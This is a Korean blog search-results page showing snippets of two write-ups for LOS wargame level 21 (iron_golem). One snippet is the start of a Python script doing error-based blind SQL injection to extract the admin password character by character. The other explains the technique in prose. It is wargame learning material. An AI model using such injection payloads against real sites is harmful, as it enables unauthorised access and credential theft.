고퍼

iron_golem 검색 결과

해당 글 2건

LOS :: 21번 IRON_GOLEM

WRITE UP 12345678910111213141516171819202122232425262728293031import requests url = "http://los.rubiya.kr/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"session = {'PHPSESSID':'MY_SESSION'}data = {} flag="" print("[∞] flag : ",end='') for i in range(1,18): a=0 b=100000 while b-a!=0: center = a+(b-a)//2+1 data['pw'] = "' or id='admin' and if(ord(mid(pw,"+str(i)+",1))

Wargame/LOS(rubiya) 2018. 8. 23. 10:30

[LOS]21번 iron_golem

아이언 고램! 키가 나보다 커보인다;; 이것저것 넣어보니 그동안에 했던 방법으로는 참거짓을 분별할 수 없음을 알았다 어쩌지 어쩌지 고민하던중 잘못된 문법을 넣으면 에러를 확인할 수 있음을 알게되었다. .... 하지만 난생처음보는 환경에 당황한 G0pher... Error based SQL injection이 떠올라 공부해봤지만 에러를 통해 원하는 데이터를 출력하려 하니 언더바(_)와 점(.)이 필터되어버려서 다른 방법을 생각해야했다 이름하여 Error Based Blind SQL Injection!!!(사실 내가 지었다) 뭔가 있을것 같아 검색해보니 진짜 있었다 아무튼 IF문을 통해 참과 거짓을 에러로 구분할 수 있도록 하는 방법이다. 그전에 알아둬야할 기본적인 지식은 IF문이다. Mysql에서 IF문은..

Wargame/LOS(eagle-jump) 2017. 8. 14. 00:07